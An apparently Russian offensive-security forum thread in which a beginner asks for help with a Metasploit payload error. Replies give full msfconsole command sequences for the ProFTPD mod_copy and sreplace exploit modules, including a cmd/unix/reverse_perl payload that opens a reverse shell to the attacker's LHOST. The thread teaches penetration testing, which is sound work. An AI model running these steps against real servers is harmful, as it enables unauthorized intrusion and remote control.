• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

И снова Metasploit (Payload)

kombat

Green Team
07.07.2018
12
2
BIT
0
И снова у меня проблемы с полезной нагрузкой на этот раз выбрал нужный эксплойт и нужную нагрузку но что то пошло не так

1.png


Подскажите что я делаю не так ?!
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 999
BIT
3
Добрый день.
Вы указываете не payload , а другой эксплойт.
К тому же ещё дублируете :>set payload exploit
После выбора рекомендуется просматривать опции командой show options.
Так Вы будете ориентированы в том,что от Вас требуется для атаки или теста.
И ,смотря какую CVE пытаетесь эксплуатировать.
Если работать с proftpd_modcopy_exec,то алгоритм может быть таким :
Код:
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > show targets
msf exploit(proftpd_modcopy_exec) > set TARGET id_цели
msf exploit(proftpd_modcopy_exec) > show options - проверяем опции,сверяем
msf exploit(proftpd_modcopy_exec) > exploit
Эксплуатация с задействованием демона proftpd на сервере FTP может быть такой:
Код:
msf> use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST IP_цели
set SITEPATH /var/www/html/имя_тестовой_директории
set TARGETURI /имя_тестовой_директории/
set PAYLOAD cmd/unix/reverse_perl
set LHOST IP_атакующей машины
> run
Либо можете провести стандартную атаку:
Код:
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost IP_цели
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_modcopy_exec) > run
И с модулем proftp_sreplace ведётся аналогичная работа с таким алгоритмом:
Код:
msf > use exploit/linux/ftp/proftp_sreplace
      msf exploit(proftp_sreplace) > show targets
      msf exploit(proftp_sreplace) > set TARGET id_цели
      msf exploit(proftp_sreplace) > show options
      msf exploit(proftp_sreplace) > exploit
Из опций только не забываем указать необходимые параметры.
 

kombat

Green Team
07.07.2018
12
2
BIT
0
Добрый день.
Вы указываете не payload , а другой эксплойт.
К тому же ещё дублируете :>set payload exploit
После выбора рекомендуется просматривать опции командой show options.
Так Вы будете ориентированы в том,что от Вас требуется для атаки или теста.
И ,смотря какую CVE пытаетесь эксплуатировать.
Если работать с proftpd_modcopy_exec,то алгоритм может быть таким :
Код:
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > show targets
msf exploit(proftpd_modcopy_exec) > set TARGET id_цели
msf exploit(proftpd_modcopy_exec) > show options - проверяем опции,сверяем
msf exploit(proftpd_modcopy_exec) > exploit
Эксплуатация с задействованием демона proftpd на сервере FTP может быть такой:
Код:
msf> use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST IP_цели
set SITEPATH /var/www/html/имя_тестовой_директории
set TARGETURI /имя_тестовой_директории/
set PAYLOAD cmd/unix/reverse_perl
set LHOST IP_атакующей машины
> run
Либо можете провести стандартную атаку:
Код:
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost IP_цели
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_modcopy_exec) > run
И с модулем proftp_sreplace ведётся аналогичная работа с таким алгоритмом:
Код:
msf > use exploit/linux/ftp/proftp_sreplace
      msf exploit(proftp_sreplace) > show targets
      msf exploit(proftp_sreplace) > set TARGET id_цели
      msf exploit(proftp_sreplace) > show options
      msf exploit(proftp_sreplace) > exploit
Из опций только не забываем указать необходимые параметры.
Спасибо
 
  • Нравится
Реакции: Vertigo

id2746

Green Team
12.11.2016
435
644
BIT
21
для выбранного эксплоита можно посмотреть перечень доступных нагрузок командой:
msf> show payloads
Screenshot_2018-10-01-13-46-43-074_com.termux.png


После чего:
msf> set payload (тут выбранная из доступных нагрузок)

и продолжить настройку.
 
  • Нравится
Реакции: Vertigo и n01n02h

kombat

Green Team
07.07.2018
12
2
BIT
0
для выбранного эксплоита можно посмотреть перечень доступных нагрузок командой:
msf> show payloads
Посмотреть вложение 22591

После чего:
msf> set payload (тут выбранная из доступных нагрузок)

и продолжить настройку.
Ух ты я не знал, спасибо за информацию
 
  • Нравится
Реакции: id2746
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!